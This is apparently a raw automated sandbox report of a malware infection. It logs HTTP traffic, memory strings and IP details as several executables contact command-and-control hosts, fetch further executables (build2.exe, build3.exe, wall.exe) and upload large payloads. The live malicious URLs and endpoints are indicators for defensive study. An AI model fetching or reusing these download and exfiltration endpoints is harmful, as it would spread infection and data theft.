Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ldvbydq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: toobussy.com
Source: global traffic	HTTP traffic detected: GET /153ce668f1e21829c936c2b11fa4d869 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://johgspytq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: toobussy.com
Source: global traffic	HTTP traffic detected: GET /upload.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://johgspytq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: toobussy.comData Raw: 3b 6e 58 10 86 bb 6e 25 da a8 c6 0a 72 75 7d b8 7e 09 ba e5 6f 06 96 6a 7d 7f 7d 91 44 b7 c5 1a ed 2b ce 5a 00 6a 2a 69 e9 ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 76 2b c2 a9 03 1d f8 c8 ae 41 5b 88 ca c5 8a e5 5b 6f b3 9d 8a a4 b5 10 c6 90 88 3c 98 62 59 60 7e 02 43 d5 60 8a 1f 1e fd db d6 f1 cf 9d 49 59 e6 a6 ed 75 a0 3c f1 2f f3 2d d1 44 44 41 87 57 32 e7 1e 00 59 25 a4 Data Ascii: ;nXn%ru}~oj}}D+Zji?$`7C[zqNA -[k,vuv+A[[o<bY`~C`IYu</-DDAW2Y%
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yfbji.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vqbiuki.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----9446067979963259User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022Content-Length: 138156Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lhwny.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: toobussy.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qwnrfooy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: toobussy.com
Source: global traffic	HTTP traffic detected: GET /153ce668f1e21829c936c2b11fa4d869 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022
Source: global traffic	HTTP traffic detected: GET /upload.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4277143105361319User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022Content-Length: 131676Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	ASN Name: GPRS-ASZAINKW GPRS-ASZAINKW
Source: Joe Sandbox View	ASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR

Source: Joe Sandbox View	IP Address: 37.34.248.24 37.34.248.24
Source: Joe Sandbox View	IP Address: 37.34.248.24 37.34.248.24

Source: global traffic

TCP traffic: 192.168.2.3:49727 -> 5.75.213.102:22022

Source: unknown

Network traffic detected: IP country count 14

Source: 6C74.exe, 00000018.00000002.618961706.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://colisumy.com/dl/build2.exe
Source: 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://colisumy.com/dl/build2.exe$run
Source: explorer.exe, 00000001.00000000.379122239.00007FFC1B439000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
Source: explorer.exe, 00000001.00000000.379122239.00007FFC1B439000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
Source: 759F.exe, 00000006.00000003.442957824.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000006.00000002.450044131.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000006.00000003.442293058.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000003.449851407.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.457202907.0000000000647000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.503214555.0000000000961000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000003.500060099.000000000095F000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455817326.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000003.454348016.000000000075C000.00000004.00000020.00020000.00000000.sdmp, consent.exe, 00000012.00000003.454538417.0000021518B95000.00000004.00000020.00020000.00000000.sdmp, consent.exe, 00000012.00000002.455286499.0000021518B9A000.00000004.00000020.00020000.00000000.sdmp, AF5C.exe, 00000017.00000002.462314714.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 00000018.00000003.461708895.0000000000842000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618961706.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000002.480583823.000000000096C000.00000004.00000020.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000003.463872681.000000000096B000.00000004.00000020.00020000.00000000.sdmp, 86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp, E8B1.exe, 0000001D.00000002.476339499.000000000068C000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.489628631.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000020.00000003.480302311.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 759F.exe, 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, AF5C.exe, 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, AF5C.exe, 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E8B1.exe, 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, E8B1.exe, 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, 6000.exe, 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: 6C74.exe, 0000000C.00000002.457202907.00000000006ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.m
Source: 6C74.exe, 00000018.00000003.489494423.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000001.00000000.373438154.000000000F270000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 6C74.exe, 00000018.00000003.489713878.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: 6C74.exe, 00000018.00000003.489878035.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: 6C74.exe, 00000018.00000003.489939805.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: 759F.exe, 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 6C74.exe, 00000018.00000003.489980811.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: 6C74.exe, 00000018.00000003.490026604.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: 6C74.exe, 00000018.00000003.490091904.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: 6C74.exe, 00000018.00000003.490127284.0000000003170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/
Source: 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/-98D0-4585-A1ED-B2838757AE1B
Source: 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/files/1/build3.exe
Source: 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/files/1/build3.exe$run
Source: 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0
Source: 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/raud/get.php
Source: 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true
Source: 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/raud/get.phpep
Source: 759F.exe, 00000006.00000002.450044131.0000000000687000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000003.449851407.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.457202907.0000000000647000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.503214555.0000000000961000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000003.500060099.000000000095F000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455817326.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000003.454348016.000000000075C000.00000004.00000020.00020000.00000000.sdmp, AF5C.exe, 00000017.00000002.462314714.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 00000018.00000003.461708895.0000000000842000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618961706.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp, E8B1.exe, 0000001D.00000002.476339499.000000000068C000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.489628631.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000020.00000003.480302311.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: 9B15.exe, 0000001A.00000002.480583823.000000000096C000.00000004.00000020.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000003.463872681.000000000096B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/5q
Source: 759F.exe, 00000006.00000002.450044131.0000000000687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/YI
Source: E8B1.exe, 0000001D.00000002.476339499.000000000068C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/c
Source: 759F.exe, 0000000E.00000002.503214555.0000000000961000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000003.500060099.000000000095F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/cK~
Source: E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp, E8B1.exe, 0000001D.00000002.476339499.000000000068C000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, 6000.exe, 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.489628631.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000020.00000003.480302311.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: AF5C.exe, 00000017.00000002.462314714.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json&
Source: 759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json(
Source: E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json-
Source: 9B15.exe, 0000001A.00000002.480583823.0000000000927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json/
Source: 759F.exe, 0000000E.00000002.503130852.0000000000942000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json0
Source: 759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json3r=
Source: 759F.exe, 00000011.00000002.455706179.0000000000718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json6H(m
Source: 86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json9:
Source: 86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonA5
Source: 86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonAnX
Source: 6C74.exe, 00000018.00000003.461708895.0000000000842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonD
Source: 759F.exe, 00000006.00000002.450044131.0000000000687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonHf
Source: AF5C.exe, 00000017.00000002.462314714.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonJ
Source: 6C74.exe, 0000000C.00000002.457202907.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonM
Source: 759F.exe, 00000020.00000002.489628631.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000020.00000003.480302311.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonMcp
Source: 6C74.exe, 0000000C.00000002.457202907.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonU
Source: 759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonV
Source: E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonZ
Source: 759F.exe, 00000011.00000002.455817326.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000003.454348016.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonZ/
Source: 759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsona
Source: 9B15.exe, 0000001A.00000002.480583823.0000000000927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsona_
Source: E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonal.
Source: 759F.exe, 0000000E.00000002.503130852.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonc
Source: 759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsondllB
Source: E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonf
Source: 759F.exe, 0000000E.00000002.503130852.0000000000942000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonh
Source: 86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsoninp
Source: AF5C.exe, 00000017.00000002.462314714.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonj
Source: 759F.exe, 0000000E.00000002.503214555.0000000000961000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000003.500060099.000000000095F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonkn
Source: 86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonnn
Source: 759F.exe, 00000011.00000002.455706179.000000000073F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonq
Source: 759F.exe, 00000011.00000002.455706179.0000000000718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsons3H/m
Source: 9B15.exe, 0000001A.00000002.480583823.0000000000927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonw_
Source: E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonx
Source: 759F.exe, 00000011.00000002.455706179.0000000000718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonzO
Source: 86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonzn
Source: 9B15.exe, 0000001A.00000002.480583823.000000000096C000.00000004.00000020.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000003.463872681.000000000096B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/oqH
Source: 759F.exe, 00000011.00000002.455817326.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000003.454348016.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/y
Source: 6C74.exe, 00000018.00000002.619618353.0000000003073000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://we.tl/t-vKvLYNOV
Source: 6C74.exe, 00000018.00000002.618961706.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.619618353.0000000003073000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://we.tl/t-vKvLYNOV9o

Source: unknown

DNS traffic detected: queries for: potunulit.org

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: astoriaresidency.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: astoriaresidency.com
Source: global traffic	HTTP traffic detected: GET /headlist HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shsplatform.co.uk
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: astoriaresidency.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /headlist HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e96a9d9fbfb9d3de5c_4986863142029452830
Source: global traffic	HTTP traffic detected: GET /headlist HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e96a9d9fbfb9d3de5c_4986863142029452830
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
Source: global traffic	HTTP traffic detected: GET /wall.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
Source: global traffic	HTTP traffic detected: GET /153ce668f1e21829c936c2b11fa4d869 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022
Source: global traffic	HTTP traffic detected: GET /upload.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /wall.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
